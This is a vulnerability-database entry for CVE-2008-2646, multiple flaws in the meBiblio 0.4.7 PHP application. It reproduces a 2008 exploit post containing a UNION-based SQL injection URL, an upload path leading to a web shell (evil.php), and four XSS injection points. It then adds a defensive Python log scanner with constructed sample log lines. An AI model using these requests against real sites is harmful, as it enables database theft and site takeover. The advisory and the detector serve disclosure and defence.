meBiblio Multiple Cross-Site Scripting Vulnerabilities

Vulnerability ID: 1115324 Vulnerability type: Cross-site scripting
Published: 2008-06-01 Updated: 2009-04-14
CVE ID: CVE-2008-2646 CNNVD-ID: CNNVD-200806-151
Affected platform: PHP CVSS score: 4.3
|Vulnerability source
https://www.exploit-db.com/exploits/5716
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200806-151
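|Vulnerability details
meBiblio 0.4.7 contains multiple cross-site scripting vulnerabilities. A remote attacker can inject arbitrary web script or HTML via (1) the sql parameter to dbadd.inc.php, (2) the InsertJournal parameter to add_journal_mask.inc.php, (3) the InsertBibliography parameter to insert_mask.inc.php, and (4) the LabelYear parameter to search_mask.inc.php.
|Exploit (EXP)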
========================================================================================
 meBiblio 0.4.7 Remote SQL Injection/ Arbitrary File Upload Exploit / XSS Vulnerability
========================================================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'

AUTHOR : CWH Underground
DATE   : 1 June 2008
SITE   : www.citec.us


#####################################################
 APPLICATION : meBiblio
 VERSION     : 0.4.7 (Latest Version)
 VENDOR      : http://mebiblio.sourceforge.net/ 
 DOWNLOAD    : http://downloads.sourceforge.net/mebiblio
#####################################################

---SQL Injection Exploit---

http://[target]/[path]/admin/journal_change_mask.inc.php?JID=1%20union%20select%201,PACS_description,1,1%20FROM%20pacs%20where%20PACS_ID=2

** You will find PACS_description in Journal Long Name's Box **


---Arbitrary File Upload Exploit---

[Files Directory must exist]

Upload Path: http://[target]/[path]/upload/uploader.html

Shell Script: http://[target]/[path]/files/evil.php


---Multiple Remote XSS Exploit---

[+]dbadd.inc.php
[+]add_journal_mask.inc.php
[+]insert_mask.inc.php
[+]search_mask.inc.php

Example:
     
http://[target]/[path]/dbadd.inc.php?sql=<XSS>
http://[target]/[path]/add_journal_mask.inc.php?InsertJournal=<XSS>
http://[target]/[path]/insert_mask.inc.php?InsertBibliography=<XSS>
http://[target]/[path]/search_mask.inc.php?LabelYear=<XSS>


##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################

# milw0rm.com [2008-06-01]
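
For defenders reviewing web-server logs for the four reflected parameters listed above, the following added example (not part of the original advisory or of meBiblio) flags requests in which one of those parameters carries HTML metacharacters, including doubly percent-encoded ones. The combined log format, the /biblio/ path and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Script/parameter pairs named in the advisory for meBiblio 0.4.7.
REFLECTED_PARAMS = {
    "dbadd.inc.php": "sql",
    "add_journal_mask.inc.php": "InsertJournal",
    "insert_mask.inc.php": "InsertBibliography",
    "search_mask.inc.php": "LabelYear",
}
# Request line inside a combined-format access log entry (format is an assumption).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Characters that let a reflected value leave text or attribute context.
MARKUP_RE = re.compile(r'[<>"\']')

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding, e.g. %253C -> %3C -> <."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_requests(log_lines):
    """Return (script, parameter, decoded_value) for each flagged request."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        script = url.path.rsplit("/", 1)[-1]
        param = REFLECTED_PARAMS.get(script)
        if param is None:
            continue  # not one of the four scripts from the advisory
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            value = fully_decode(value)  # parse_qsl has already decoded once
            if name == param and MARKUP_RE.search(value):
                hits.append((script, name, value))
    return hits

# Constructed sample log lines (not taken from the page).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jun/2008:10:00:00 +0000] "GET /biblio/search_mask.inc.php?LabelYear=2008 HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Jun/2008:10:00:05 +0000] "GET /biblio/search_mask.inc.php?LabelYear=%3Cb%3E2008%3C%2Fb%3E HTTP/1.1" 200 530',
    '192.0.2.12 - - [01/Jun/2008:10:00:09 +0000] "GET /biblio/dbadd.inc.php?sql=%253Ci%253Ex HTTP/1.1" 200 498',
    '192.0.2.13 - - [01/Jun/2008:10:00:12 +0000] "GET /biblio/index.php?q=%3Cb%3E HTTP/1.1" 200 100',
]
```

Matches are triage leads rather than proof of exploitation, since quote characters can also appear in benign values.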
|References

Source: XF
Name: mebiblio-multiple-scripts-xss(42760)
Link: http://xforce.iss.net/xforce/xfdb/42760
Source: BID
Name: 29465
Link: http://www.securityfocus.com/bid/29465
Source: MILW0RM
Name: 5716
Link: http://www.milw0rm.com/exploits/5716
Source: SECUNIA
Name: 30488
Link: http://secunia.com/advisories/30488